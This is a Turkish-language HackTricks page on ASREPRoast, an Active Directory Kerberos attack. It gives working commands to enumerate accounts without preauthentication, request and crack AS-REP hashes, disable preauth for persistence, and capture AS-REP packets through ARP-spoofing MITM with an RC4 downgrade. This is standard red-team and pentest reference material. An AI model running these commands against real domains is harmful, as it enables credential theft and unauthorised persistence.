ASREPRoast

AWS hacklemeyi sıfırdan kahramana öğrenin htARTE (HackTricks AWS Red Team Expert) ile!

HackTricks'ı desteklemenin diğer yolları:

Deneyimli hackerlar ve ödül avcıları ile iletişim kurmak için HackenProof Discord sunucusuna katılın!

Hackleme İçgörüleri Hackleme heyecanını ve zorluklarını inceleyen içeriklerle etkileşime geçin

Gerçek Zamanlı Hack Haberleri Hızlı tempolu hackleme dünyasında gerçek zamanlı haberler ve içgörülerle güncel kalın

En Son Duyurular Yeni ödül avı başlatmaları ve önemli platform güncellemeleri hakkında bilgilenin

Bize katılın Discord ve bugün en iyi hackerlarla işbirliğine başlayın!

ASREPRoast

ASREPRoast, Kerberos ön kimlik doğrulaması gereken özelliğe sahip olmayan kullanıcıları hedef alan bir güvenlik saldırısıdır. Temelde, bu zafiyet saldırganlara, kullanıcının şifresine ihtiyaç duymadan Bir Alan Denetleyicisinden (DC) bir kullanıcı için kimlik doğrulaması isteme imkanı sağlar. DC daha sonra, saldırganların kullanıcının şifresini keşfetmek için çevrimdışı olarak kırmaya çalışabilecekleri kullanıcının şifresinden türetilmiş anahtarla şifrelenmiş bir ileti ile yanıt verir.

Bu saldırı için ana gereksinimler şunlardır:

  • Kerberos ön kimlik doğrulamasının eksikliği: Hedef kullanıcıların bu güvenlik özelliğine sahip olmaması gerekir.

  • Alan Denetleyicisine (DC) bağlantı: Saldırganların istek göndermek ve şifreli iletileri almak için DC'ye erişime ihtiyacı vardır.

  • İsteğe bağlı alan hesabı: Bir alan hesabına sahip olmak, saldırganların LDAP sorguları aracılığıyla daha verimli bir şekilde savunmasız kullanıcıları tanımlamalarına olanak tanır. Böyle bir hesaba sahip olmayan saldırganlar, kullanıcı adlarını tahmin etmek zorundadır.

Savunmasız kullanıcıları sıralama (alan kimlik bilgilerine ihtiyaç duyar)

{% code title="Windows Kullanarak"}

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
Linux Kullanımı
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName

AS_REP mesajı isteği

Linux Kullanarak
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
Windows Kullanımı
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

Rubeus ile AS-REP Roasting işlemi, şifreleme türü 0x17 ve ön kimlik doğrulama türü 0 olan bir 4768 oluşturacaktır.

Kırılması

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Kalıcılık

GenericAll izinlerine sahip olduğunuz bir kullanıcı için preauth zorunlu değilse (veya özellikler yazma izinlerine sahipseniz):

Windows Kullanarak
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
Linux Kullanımı

```bash bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH ``` ## Kimlik bilgileri olmadan ASREProast

Bir saldırgan, Kerberos ön kimliğin devre dışı bırakılmış olmasına güvenmeden ağ üzerinde dolaşırken AS-REP paketlerini yakalamak için bir adam ortasında konumlanabilir. Bu nedenle, bu yöntem VLAN'daki tüm kullanıcılar için çalışır. ASRepCatcher bize bunu yapma imkanı tanır. Dahası, araç, Kerberos müzakeresini değiştirerek istemci iş istasyonlarının RC4'ü kullanmasını zorlar.

# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP

# Disabling ARP spoofing, the mitm position must be obtained differently
ASRepCatcher relay -dc $DC_IP --disable-spoofing

# Passive listening of AS-REP packets, no packet alteration
ASRepCatcher listen

Referanslar


HackenProof Discord sunucusuna katılın ve deneyimli hackerlar ve ödül avcıları ile iletişim kurun!

Hacking Insights Hacking'in heyecanına ve zorluklarına inen içeriklerle etkileşime girin

Gerçek Zamanlı Hack Haberleri Hızlı tempolu hacking dünyasında gerçek zamanlı haberler ve içgörülerle güncel kalın

En Son Duyurular Yeni ödül avı başlatmaları ve önemli platform güncellemeleri hakkında bilgilenin

Bize Katılın Discord ve bugün en iyi hackerlarla işbirliğine başlayın!

Sıfırdan kahraman olacak şekilde AWS hacklemeyi öğrenin htARTE (HackTricks AWS Red Team Expert)!

HackTricks'i desteklemenin diğer yolları:

Last updated